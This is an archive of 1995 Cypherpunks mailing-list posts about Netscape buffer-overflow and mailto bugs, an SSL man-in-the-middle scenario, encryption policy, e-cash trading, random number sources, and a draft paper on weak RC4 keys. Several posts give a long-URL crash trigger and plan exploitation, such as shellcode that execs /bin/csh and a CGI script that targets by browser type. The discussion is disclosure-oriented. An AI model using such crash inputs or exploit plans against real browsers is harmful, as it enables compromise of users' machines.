encryption scheme that the gubument has the back door to is a bad idea.

	Sorry, I'll end my ranting now.

---
Fletch                                                     __`'/|
fletch@ain.bls.com  "Lisa, in this house we obey the       \ o.O'    ______
404 713-0414(w)	     Laws of Thermodynamics!" H. Simpson   =(___)= -| Ack. |
404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43  U      ------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Yih-Chun Hu <yihchun@u.washington.edu>
Date: Fri, 22 Sep 95 10:04:56 PDT
To: "Dietrich J. Kappe" <goedel@tezcat.com>
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <v01510100ac8821ac2b23@[206.1.161.4]>
Message-ID: <Pine.OSF.3.91j.950922100229.23946B-100000@saul3.u.washington.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 22 Sep 1995, Dietrich J. Kappe wrote:

> Netscape 1.1N on a powermac crashes hard on that url. If anyone wants to try
> it out, I've put up a simple page with the url at
> 

Netscape, Windows (its a school computer) works fine w/ a proxy.
When there is no proxy, Windows dies. EMM dies. Lots of stuff dies.
So use a proxy.

> http://www.redweb.com/experiment/bug.html
> 
> *warning* view the source before you click on strange links!!!

Sometimes you won't expect it, ie for netscape enhancements click
here (or on the Netscape logo).

+---- Yih-Chun Hu (finger:yihchun@cs.washington.edu) ----------------------+
| http://www.cs.washington.edu/homes/yihchun     yihchun@cs.washington.edu |
| http://weber.u.washington.edu/~yihchun         yihchun@u.washington.edu  |
+---- PGP Key Fingerprints (Keys by FINGER or on WWW) ---------------------+
| 1024/E50EC641        B2 A0 DE 9E 36 C0 EB A6  F9 3E D2 DD 2F 27 74 79    |
| 2047/DF0403F9        18 EB 62 C8 7F 06 04 67  42 76 24 E2 99 D1 07 DC    |
+--------------------------------------------------------------------------+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David J. Bianco" <bianco@itribe.net>
Date: Fri, 22 Sep 95 07:10:59 PDT
To: cypherpunks@toad.com
Subject: SSL Man-in-the-middle
Message-ID: <199509221407.KAA23176@gatekeeper.itribe.net>
MIME-Version: 1.0
Content-Type: text/plain


Has anyone given much thought to the feasability of a man-in-the-middle
attack against an SSL (or other similar) transaction?  To me, the
possibility seems obvious, so I figure it must have been discussed before,
though I haven't seen it.

The basic idea is pretty simple, really a flaw in the user interface of the
browser more than a flaw in SSL.  Neither browsers nor servers routinely
validate that they are communicating with the entity they think they are.
 Sure, with netscape you can ask for the document information window, which
shows the server's public key information, but this isn't a common action
among users, and certainly isn't something you'd want to do for every page
you viewed.

The only readily accessible information about security is that blue key at
the bottom of the netscape window.  Netscape docs tell you that if that key
is blue, your transaction is "secure."  In reality, the only thing that key
means is that you've negotiated a session key and are encrypting your
communications.  It says nothing about the fact that you're actually
communicating with the correct party.  Authentication is a large part of
security, and Netscape doesn't make that information conveniently
available.

Consider the following example.  Bob wants to communicate securely with
Alice.  He fires up his "secure" browser, looks up Alice's address in the
DNS and makes a connection.  He then sends Alice a document and
disconnects.

Now consider the following attack on the scenario:  Bob still wants to
 communicate with Alice.  He fires up his browser and looks up Alice in the
DNS.  Mallet, who wants the information Bob's sending, has subverted
Alice's DNS server and replaced Alice's IP address with his own, making a
note of the proper value.  Thus, when Bob looks up Alice's address in DNS,
he gets the wrong information and contacts Mallet instead.  Mallet performs
the SSL protocol with Bob, pretending to be the server, and then with
Alice, pretending to be the client.

Since neither the browser nor the server perform any authentication checks,
neither Bob nor Alice know they are really speaking to Mallet.  The best
Alice can do is check the IP address of the client she's speaking to, but
if Mallet has his own DNS, he can make the IP address map to whatever name
he wants, including Bob, in order to fool alice.  Even if Alice doesn't
depend on the DNS for IP resolution, probably doesn't know that the IP
address in question is really Mallet's, since it looks just like any other
IP address to her.

In this scenario, Bob gets a warm fuzzy since his key is blue and he knows
his information is being encrypted as it goes out.  Alice has a smaller
fuzzy, since she believes the transaction is secure from prying eyes.
 Mallet has a *really big* fuzzy, since he's able to read the data Bob
sends, decrypt it, save it, then re-send it to Alice.

I've read through the SSL spec, and it provides authentication for both the
server and the client, but these features are rarely used, probably because
they are somewhat inconvenient for the user.  A good first step would be to
include the IP address of the server in the certificate signed by VeriSign.
 In this way, browsers could perform automatic checks that the IP address
in the certificate is actually the one that's being communicated with.
 This does raise other questions (such as protecting from IP spoofing), but
IMHO would be a good way of providing an automatic "first check" without
inconveniencing users.  The added inconvenience of obtaining a new
certificate when your server's IP address changes is fairly minor, and
could be viewed as necessary overhead for doing secure transactions via the
Net.



--
==========================================================================
David J. Bianco			| Web Wonders, Online Oddities, Cool Stuff
iTribe, Inc.			| Phone: (804) 446-9060 Fax: (804) 446-9061
Suite 1700, World Trade Center	| email: <bianco@itribe.net>
Norfolk, VA 23510		| URL  : http://www.itribe.net/~bianco/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott M Fabbri <m1smf99@FRB.GOV>
Date: Fri, 22 Sep 95 07:13:45 PDT
To: perry@piermont.com
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <199509221243.IAA03781@frankenstein.piermont.com>
Message-ID: <9509221411.AA00721@arcss5.FRB.GOV>
MIME-Version: 1.0
Content-Type: text/plain


> I don't believe the Sun Java stuff would suffer from it, although I
> fear Java a great deal.

Java's doesn't break on this one. All you get back is a message saying the 
domain isn't defined.

BTW: This was tested using 

http://foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.
foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo
.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.fo
o.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.f
oo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.
foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo
.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.fo
o.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.f
oo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.
foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo
.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.fo
o.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo.foo/

on a SunOS box using HotJava 1.0 alpha 3.

Scott
--
Scott Fabbri                                  sfabbri@frb.gov
Opinions solely my own -- who else would want them?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pdlamb@iquest.com (Patrick Lamb)
Date: Fri, 22 Sep 95 08:15:53 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Another Netscape Bug (and possible security hole)
Message-ID: <199509221515.KAA01511@vespucci.iquest.com>
MIME-Version: 1.0
Content-Type: text/plain


HotJAVA apparently doesn't suffer from this bug, at least the 1.03 Alpha NT
version.  On the other hand, HotJava does truncate the URL to fit in its
window.  (I suppose I could try a very large screen with a very small font,
just to make sure -- anyone willing to donate a 19" screen or bigger?)

Pat
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQENAzACleQAAAEH/2+41W3bZPuWU1gv6A0bq3a57bgCiCAbU1QY41f+NI1I8i/+
a/L314RIpCR0iCZhsNMHNI9rVovsbmOQE4Cf9YYL3cClUoE2VAsLOi9LAjlN8qYc
kmAqpsGQ39eaKrnlC/0lxJtFZgypT4m9UIsTU986y3gyy+ZTWwxtbDaLBEdsTiH/
e+zosoBiXmwWYY1n+5yvaKLGMUwa20AKdoRCUgqhJQpkW0nAvItU6WhaqxwH6JXp
KCNsuP6k8FBmcKZfSSvUphSOIJnARAq9K9UPhj5BeAy1vKZ416jfgeYQUTxHQOMT
rTiQOYR/oAR35gBpGYg6p1lu6Ma5eDPtpBPadUUABRG0IFBhdHJpY2sgTGFtYiA8
cGRsYW1iQGlxdWVzdC5jb20+
=DZzp
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Simmons <jsimmons@goblin.punk.net>
Date: Fri, 22 Sep 95 10:32:29 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Netscape for Linux?
In-Reply-To: <43tmht$qfe@tera.mcom.com>
Message-ID: <199509221728.KAA07352@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> In article <199509212125.RAA00188@hoopsnake.cjs.net>, cjs@netcom.com (Christopher J. Shaulis) writes:
> > And the sad part is that now that they have announced that they are
> > dropping their unofficial Linux support, I really want to hurt
> > Netscape badly.
> 
>   This is news to me.  We have engineers spending valuable time keeping
> our linux port running.  If you tell me where you saw this, I will look
> into it.
> 
> 	--Jeff
> 
I, and many other Linux users that I know, have repeatedly contacted
Netscape offering to pay for a Linux version of Navigator - we have usually
been either 'brushed off' or completely ignored.  And now there is no
mention of a Linux port of v2.0 - not surprising that this 'rumor' is
running around.  I think a statement by you or someone else at Netscape
supporting a Linux version would go a long way in reassuring the Linux
community, even if it's something that is going to take a while.

And you might want to drop by the usenet comp.os.linux.* hierarchy - 
they're already working on ways to use your html extensions to design
web pages  that can't be read by Navigator ... 

-- 
Jeff Simmons                           jsimmons@goblin.punk.net



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Fri, 22 Sep 95 07:25:19 PDT
To: cypherpunks@toad.com
Subject: Re: Another Netscape Bug (and possible security hole)
Message-ID: <9509221425.AA15952@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> Received: from relay3.UU.NET [192.48.96.8] by alcor.process.com
>            with SMTP-OpenVMS via TCP/IP; Fri, 22 Sep 1995 03:36 -0400
> Received: from toad.com by relay3.UU.NET with SMTP 
> 	id QQzigj22616; Fri, 22 Sep 1995 03:27:16 -0400
> Received: by toad.com id AA02740; Fri, 22 Sep 95 00:24:28 PDT
> Received: from quilla.tezcat.com by toad.com id AA02734; Fri, 22 Sep 95 00:24:24 PDT
> Received: from [206.1.161.4] (clubred.redweb.com [206.1.161.4]) by quilla.tezcat.com (8.6.12/8.6.12) with SMTP id CAA23469 for <cypherpunks@toad.com>; Fri, 22 Sep 1995 02:24:21 -0500
> X-Sender: goedel@204.128.247.5
> Message-Id: <v01510100ac8821ac2b23@[206.1.161.4]>
> Mime-Version: 1.0
> Content-Type: text/plain; charset="us-ascii"
> Date: Fri, 22 Sep 1995 02:25:21 -0600
> To: cypherpunks@toad.com (Cypherpunks Mailing List)
> From: goedel@tezcat.com (Dietrich J. Kappe)
> Subject: Re: Another Netscape Bug (and possible security hole)
> Sender: owner-cypherpunks@toad.com
> Precedence: bulk
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> >Ray Cromwell writes:
> >> I've found a Netscape bug which I suspect is a buffer overflow and
> >> may have the potential for serious damage. If it is an overflow bug,
> >> then it may be possible to infect every computer which accesses a web
> >> page with Netscape. To see the bug, create an html file containing
> >> the following:
> >
> >Oh brother, this is unbelievable !
> >
> >I'm using Netscape 1.1N under SunOS 4.1.2.

I can crash Netscape 1.1N under NT by entering a URL with 
a very long domain name in the 'Location:' window.


Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David J. Bianco" <bianco@itribe.net>
Date: Fri, 22 Sep 95 07:37:04 PDT
To: Dave Del Torto <ddt@lsd.com>
Subject: Re: Cypherpunks Press release
In-Reply-To: <v03003311ac878dd1ef9a@[129.46.82.94]>
Message-ID: <199509221430.KAA23225@gatekeeper.itribe.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sep 22,  6:26, Dave Del Torto sent the following to the NSA's mail
archives:
> Subject: Re: Cypherpunks Press release
|| I think a media contact group is a good idea too, but I think we should
|| handle it by having a special address <cypherpunks-press@toad.com> that
|| media people can send to to request information and that it should split
|| the incoming mail and route it to a group of volunteers who could then
|| respond. Question from media people are usually NOT going to be heavily
|| tech-oriented, and this sort of press list would give the lesser
|| cryptologists among us, who nevertheless have a significant amount of
|| knowledge about public policy issues concerning crypto, a chance to be
|| useful.
||

I like this idea, too, except that it presupposes that the journalists who
want to contact cypherpunks have access to email.  Although that's a common
thing, it's not uniformly available yet.  Still, it's a useful service for
those journalists who do have access to email.  Perhaps both could be done,
with the people on the mailing list also available via conventional means
for the less techno-savvy journalists.

--
==========================================================================
David J. Bianco			| Web Wonders, Online Oddities, Cool Stuff
iTribe, Inc.			| Phone: (804) 446-9060 Fax: (804) 446-9061
Suite 1700, World Trade Center	| email: <bianco@itribe.net>
Norfolk, VA 23510		| URL  : http://www.itribe.net/~bianco/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephan Somogyi <somogyi@digmedia.com>
Date: Fri, 22 Sep 95 10:45:53 PDT
To: cypherpunks@toad.com
Subject: Re: "Gnusaic"? Why not a Gnu-Style Web Browser?
Message-ID: <v03003400ac88a55e4e4b@[198.93.25.99]>
MIME-Version: 1.0
Content-Type: text/plain


At 23:23 21.9.95, Alex Tang wrote:

> Yes.  This has been done.  A set of patches for NCSA's HTTPd (for US
> folks only) can be found at
>
>       http://petrified.cic.net/~altitude/ssl/howto.html
>
> I got the patches from the ssleay gang in AU, but i haven't seen them on
> their ftp site yet, so if you're outside the states, it'll be available
> rsn (i think...)

Has anyone already created the necessary patches for Apache
<http://www.apache.org/>, or does anyone know whether the Apache dev
team would be amenable to including conditional directives to allow the
build of a secure version? If anyone is thinking of making the effort
to create a publicly available secure server, Apache's probably the
best source base to work with.

________________________________________________________________________
Stephan Somogyi            Think Tank Grenadier            Digital Media






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 22 Sep 95 08:09:16 PDT
To: wb8foz@netcom.com (David Lesher)
Subject: Re: Council of Europe proposes to outlaw strong encryption (fwd)
Message-ID: <199509221509.LAA09991@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


>The proposal would make telecoms operators responsible for decrypting         
>traffic and supplying it to governments when asked.  It would also             
>`change national laws to enable judicial authorities to chase hackers          
>across borders'.                                                               
>                                                                               
>However, `it remains possible that cryptography is available          
>to the public which cannot be deciphered,' his document says. `This            
>might lead to the conclusion to put restrictions on the possession,            
>distribution, or use of cryptography.'                
                         
This should prove about as effective as the current French or Russian bans.
What are they going to do when they figure out that there need no longer be
such a thing as a telecoms operator.  We do most of the message packaging
ourselves.  It will be a bit difficult for any connectivity supplier to tell
what's going out via one of our encrypted IP sessions.

Question for Perry -- I'm assuming that it will soon be possible to
originate encrypted TCP/IP sessions with a distant "process" somewhere.  Do
you see technical problems with a TCP/IP laundry being established
"somewhere" that strips trace info from one of my processes and prevents
back tracing beyond the mouth of this encrypted pipe?

Also Perry, what did you think of the article "How Anarchy Works" in the
latest Wired on the IETF?

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lethin@ai.mit.edu (Rich Lethin)
Date: Fri, 22 Sep 95 08:15:08 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199509221511.LAA09778@grape-nuts.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



I just received the following email message:

   I just concluded a small number of trades whereby I purchased cb$ with US$
   at the rate of US$8 per cb$100. An obvious concern with ticker tapes is the
   loss of privacy. The truly paranoid should avoid even posting exchange
   rates, but even regular folks might want to avoid the details of each of
   their transactions.

I still think a ticker tape to ecm with concluded transactions and
bids taking place on the electronic cash market web pages is useful.

I don't want to spend time polling various exchanges.  The ticker tape
could also be used to do arbitrage between exchanges.

The names of the participants can be omitted to protect anonymity of
traders.  Besides, if the traders really want to protect anonymity
they'll be working through remailers or TCP tunnels.

The exchange SHOULD be listed on the ticker tape, so that people
wanting to trade can find the spot where they can make the trade.
This then serves as an advertising means for the exchanges which are
offering the best prices and volume, etc.

In any transaction one of the two parties will have wished they'd
known the market price, if the price of the transaction is not at the
market price.

This ignores the value of the reputation of the parties involved, etc.

So I propose that transactions and offers be sent to ecm in the
following form:

E=<number> US=<number> BUY-OFFER|SELL-OFFER|CONCLUDED DATE TIME serial# EUID=<exchange-uid>

which is more or less the original syntax for ecm, substituting the
exhange UID for the email address of the person making the offer.

As usual the syntax is optional, so you should feel free to append
other information as you'd like (expiration date, method of concluding
transaction, etc.)

---
Concurrent VLSI Arch. Group     545 Technology Sq., Rm. 610
MIT AI Lab                      Cambridge, MA 02139 (617)-253-0972

(To subscribe to ecm, send email to ecm-request@ai.mit.edu with the
word subscribe in the body.  A digest version is available at
ecm-digest-request.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 22 Sep 95 11:28:44 PDT
To: rjc@clark.net (Ray Cromwell)
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <199509221713.NAA11980@clark.net>
Message-ID: <199509221823.LAA19265@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Suggestion: Once you figure out how to exploit it for a
particular platform write a cgi-script which checks the USER_AGENT (or
whatever it is called) environment variable to make sure the netscape
that has reached your exploit is the same platform as the exploit was
written for.

> 
> Perry writes:
> > > These buffer overflow bugs should be taught in every programming
> > > 101 course along with fencepost errors.
> > > 
> > > I'm not even sure if I want to write the obligatory program to exploit
> > > the hack given that some malicious jerk would probably use it
> > > on his home page to attack people.
> > 
> > The problem is that if you don't produce a (benign) exploit people
> > aren't going to take it seriously enough.
> 
>   Yeah, I guessed that. I'll work on it, I have a few doubts I have
> to research first. For instance, how to embed code in the domain that
> 1) server/client processing won't "cook" and 2) contains no isolated
> zero bytes which would null terminate the string.
> 
>   My current idea is to look in Netscape for an "exec" routine,
> and call it passing a "/bin/csh" to it.
> 
>   Irregardless, it's a nasty bug given that you can crash anyone's
> netscape. And on Mac/Win3.1, it may even require a reboot.
> 
> -Ray
>  
> 
>  
> 
>   
> 
> 
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Halvor Kise jr." <halvork@frodo.hiof.no>
Date: Fri, 22 Sep 95 02:25:51 PDT
To: cypherpunks@toad.com
Subject: Arena as well (was: Netscape Bug)
Message-ID: <Pine.LNX.3.91.950922112351.8228C-100000@frodo.hiof.no>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----




I am sorry to report that also Arena has this bug..
:-(

- - Halvor.

Ray Cromwell said:
I've found a Netscape bug which I suspect is a buffer overflow and
may have the potential for serious damage. If it is an overflow bug,
then it may be possible to infect every computer which accesses a web
page with Netscape. To see the bug, create an html file containing
the following:

<a href="http://foo.bar.foo.foo.foo.foo.foo.foo......
[lots deleted  :-]


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.0

iQCVAwUBMGKC4mzoaW8/SAL5AQFPrAP+Jy8fJqK5BCNQASE36NUQGs3rISlLZ1QV
PswGNegapIuD+UlTKGpNi+8QVHG5ZEKbtAmRVO9SdOiPyFWBbpLBuh9IVIstj8d1
StcqTc9FcILpxBDsi/OLuZyL3iN/CgMFlwmYj0ClEQGG4DexWP+mbD9MPANC7Nf/
duSH+Dpzf3c=
=9onX
-----END PGP SIGNATURE-----
 
--
                          *** MEMENTO MORI ***

                PGP-key by fingering halvork@frodo.hiof.no
                       http://www.hiof.no/~halvork/

            * Support The Phil Zimmermann legal defense fund *
                      http://www.netresponse.com/zldf





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Thu, 21 Sep 95 18:40:27 PDT
To: nsb@nsb.fv.com
Subject: Re: first virtual "security" (!!) (was Re: Security Flaw Is Discovered InSoftware Used in Shopping)
In-Reply-To: <RM:c0d83d13.000a7d3b.0>
Message-ID: <199509220137.LAA12354@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Laurent Demailly <dl@hplyot.obspm.fr>
  and "NSB's Portable (via RadioMail)" <nsb@radiomail.net>
  and cypherpunks@toad.com

"NSB's Portable (via RadioMail)" <nsb@radiomail.net> writes:
> At  4:32 AM 9/21/95 +0200, Laurent Demailly wrote:
...
> >financial insecurity never was a problem as
> >long as it remains under a small %.
> 
> This is an amazing statement, Laurent.
...

It's not an amazing statement. As long as the cost of insecurity is
less than cost of security, there's no problem.

...
> We're not opposed to cryptography, by the way.  There are some obvious
> places where the use of digital signatures could directly enhance our
...

Okay, so what's stopping you from starting right now with PGP?
You could simply have that as an alternative to the current system
(on a per-ID basis, ie new customers specify PGP or not).

Quite a few people both have PGP and would think well of you if you
started using it.

How about "The safest Internet payment system just got safer."?


Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMGITYCxV6mvvBgf5AQGN0wP8DxZ50ZMR3H+W6LCc0vhFZ6GMrTRZPSM4
XULabVj4w59aEDUWj2wbueXaPJUMHpAgYK83oMGLtlu1Hrxzo9/SXT/WzcMUZp7q
qajmCXRY9q3b+OXznTLavrF5qISlPY8NU/HbSi/nCF8kbT6eEf8rXc/uZgPCyV6j
RuvE2VDWaCc=
=J4iR
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: heesen@zpr.uni-koeln.de (Rainer Heesen)
Date: Fri, 22 Sep 95 02:46:54 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: YET ANOTHER BAD NETSCAPE HOLE!
In-Reply-To: <9509220850.AA07248@cs.umass.edu>
Message-ID: <9509221146.ZM25754@Sysiphos.MI.Uni-Koeln.DE>
MIME-Version: 1.0
Content-Type: text/plain


On Sep 22,  4:50am, Futplex wrote:
> Subject: Re: YET ANOTHER BAD NETSCAPE HOLE!
> Ray Cromwell writes:
> > WOW!! Unbelievable! Stop the presses! I Can't believe no one ever
discovered
> > this before! Try a page with the following URL
> >
> >  test 
> >
> > Muahaha! Yet another security hole! Clicking on this mailto brings up
> > an xterm on my machine!
>
> This is curious, because Netscape 1.1N doesn't do this on my setup, unless I
> misunderstand your description somehow. The full string including the pipe
> and all come up in the To: field of the standard Netscape mailer window. At
> that stage I see it as much less of a potential risk. I can't test what
> happens if you actually try to send mail to such a trojan horse URL, because
> there's some screwy configuration here that makes Netscape complain about
> not being able to connect to localhost (!?!) when I try to send mail from it.
>
> Mosaic 2.4 gives a standard warning page in response to this.
>
> (I'm using SunOS 4.1.2)
>
> -Futplex <futplex@pseudonym.com>
>-- End of excerpt from Futplex

This is not curious. Ray uses a very old sendmail version. It's not a Netscape
bug, it's rather a sendmail bug.

Cheers

  Rainer





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@MasPar.COM (David G. Koontz)
Date: Fri, 22 Sep 95 11:51:21 PDT
To: stewarts@ix.netcom.com
Subject: Re: Project: a standard cell random number generator
Message-ID: <9509221852.AA23179@argosy.MasPar.COM>
MIME-Version: 1.0
Content-Type: text/plain


>At 02:50 PM 9/20/95 -0700, you wrote:
 
>> In this sense, NSA ought to be *encouraging* Intel and
>>IBM and Motorola to put "generate random bits" instructions into
>>their instruction sets...
 
Intel produces a random generator (in a chip package) that is used
in STU-II..'s.  You can't buy such devices, random sources good enough
to be used for initialization for military grade cryptography are Controlled
Cryptographic Items.
 
One would think that the NSA is attempting to exploit the lack of availability
of random initialization values against their targets.  The question becomes
one of whether or not the general populace (of the U.S.) is considered a
potential target, or simply casualties of the situation in undeclared        
hostilities.
 
As a minimum one could infer that the availability of random numbers is
considered quite important for NSA secure communications.  I used to work
at a company that subscribed to NSA (National Standards Association) which
provided government and other standards on microfiche and/or hardcopy.
 
There was an interval before Reagan took office when the NSA provided all
of their unclassified standards into general availability, an era of open-
ness that came to an end with the Star Wars era.  One of those standards
was for random data sources.  The only recent standards that come to mind
are the X.509 stuff for session key generation, FIPS PUB 140-1 which
describes randomizer tests, and the recent FIPS PUB for a password generator.
These three use block ciphers to produce psuedo-random output. 
 
If NSA requires real stochastic results for military crypto, what would
we as casual cryptographers feel comfortable with?  The Netscape episode
shows the comfort level needs improving.

How good is good enough?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Roos <AndrewR@beetle.vironix.co.za>
Date: Fri, 22 Sep 95 03:01:07 PDT
To: "'rivest@theory.lcs.mit.edu>
Subject: Weak Keys in RC4
Message-ID: <3062899D@beetle.vironix.co.za>
MIME-Version: 1.0
Content-Type: text/plain



 -----BEGIN PGP SIGNED MESSAGE-----

                  A CLASS OF WEAK KEYS IN THE RC4 STREAM CIPHER

                                PRELIMINARY DRAFT

                                   ANDREW ROOS
                          VIRONIX SOFTWARE LABORATORIES


1.  INTRODUCTION

This paper discusses a class of weak keys in RSA's RC4 stream cipher. It   
shows
that for at least 1 out of every 256 possible keys the initial byte of   
the
pseudo-random stream generated by RC4 is strongly correlated with only a   
few
bytes of the key, which effecitively reduces the work required to   
exhaustively
search RC4 key spaces.


2.  STATE TABLE INITIALIZATION IN RC4

Although the RC4 algorithm has not been published by RSA Data Security,   
source
code to implement the algorithm was anonymously posted to the Cypherpunks   

mailing list several months ago. The success of the Cypherpunks'   
brute-force
attack on SSL with a 40-bit key indicates that the source code published   
did
accurately implement RC4.

RC4 uses a variable length key from 1 to 256 bytes to initialize a   
256-byte
state table which is used for the subsequent generation of pseudo-random   
bytes.
The state table is first initialized to the sequence {0,1,2,...,255}.   
Then:

1    index1 = 0;
2    index2 = 0;
3
4    for(counter = 0; counter < 256; counter++)
5    {
6        index2 = (key_data_ptr[index1] + state[counter] + index2) % 256;   
                 

7        swap_byte(&state[counter], &state[index2]);
8        index1 = (index1 + 1) % key_data_len;
9    }

Note that the only line which directly affects the state table is line 7,   
when
two bytes in the table are exchanged. The first byte is indexed by   
"counter",
which is incremented for each iteration of the loop. The second byte is
indexed by "index2" which is a function of the key. Hence each element of   
the
state table will be swapped at least once (although possibly with   
itself),
when it is indexed by "counter". It may also be swapped zero, one or more   

times when it is indexed by "index2". If we assume for the moment that
"index2" is a uniformly distributed pseudo-random number, then the   
probability
that a particular single element of the state table will be indexed by
"index2" at some time during the initialization routine is:

     P = 1 - (255/256) ^ 255
       = 0.631

(The exponent is 255 because we can disregard the case when "index2" and
"counter" both index the same element, since this will not affect its   
value.)

Conversely, there is a 37% probability that a particular element will   
_not_ be
indexed by "index2" during initialization, so its final value in the   
state
table will only be affected by a single swap, when it is indexed by   
"counter".
Since key bytes are used sequentially (starting again at the beginning   
when the
key is exhausted), this implies:

A.   Given a key length of K bytes, and E < K, there is a 37% probability   
that
     element E of the state table depends only on elements 0..E   
(inclusive) of
     the key.

(This is approximate since "index2" is unlikely to be uniformly   
distributed.)

In order to make use of this, we need to determine the most likely values   
for
elements of the state table. Since each element is swapped at least once   
(when
it is indexed by "counter"), it is necessary to take into account the   
likely
effect of this swap. Swapping is a nasty non-linear process which is hard   
to
analyze. However, when dealing with the first few elements of the state   
table,
there is a high probability that the byte with which the element is   
swapped
has not itself been involved in any previous exchanges, and therefore   
retains
its initial value {0,1,2,...,255}. Similarly, when dealing with the first   
few
elements of the state table, there is also a significant probability that   
none
of the state elements added to index2 in line 6 of the algorithm has been   

swapped either.

This means that the most likely value of an element in the state table   
can be
estimated by assuming that state[x] == x in the algorithm above. In this   
case,
the algorithm becomes:

1    index1 = 0;
2    index2 = 0;
3
4    for(counter = 0; counter < 256; counter++)
5    {
6        index2 = (key_data_ptr[index1] + counter + index2) % 256;   
                 

7        state[counter] = index2;
8        index1 = (index1 + 1) % key_data_len;
9    }

Which can be reduced to:

B.   The most likely value for element E of the state table is:

     S[E] = X(E) + E(E+1)/2
     where X(E) is the sum of bytes 0..E (inclusive) of the key.

(when calculating the sum of key elements, the key is considered to "wrap   

around" on itself).

Given this analysis, we can calculate the probability for each element of   
the
state table that it's value is the "most likely value" of B above. The   
easiest
way to do this is to evaluate the state tables produced from a number of
pseudo-randomly generated RC4 keys. The following table shows the results   
for
the first 47 elements from a trial of 100 000 eighty-bit RC4 keys:

          Probability (%)

0-7       37.0  36.8  36.2  35.8  34.9  34.0  33.0  32.2
8-15      30.9  29.8  28.5  27.5  26.0  24.5  22.9  21.6
16-23     20.3  18.9  17.3  16.1  14.7  13.5  12.4  11.2
24-31     10.1   9.0   8.2   7.4   6.4   5.7   5.1   4.4
32-39      3.9   3.5   3.0   2.6   2.3   2.0   1.7   1.4
40-47      1.3   1.2   1.0   0.9   0.8   0.7   0.6   0.6

The table confirms that there is a significant correlation between the   
first
few values in the state table and the "likely value" predicted by B.


3.  WEAK KEYS

The RC4 state table is used to generate a pseudo-random stream which is   
XORed
with the plaintext to give the ciphertext. The algorithm used to generate   
the
stream is as follows:

     x and y are initialized to 0.

     To generate each byte:

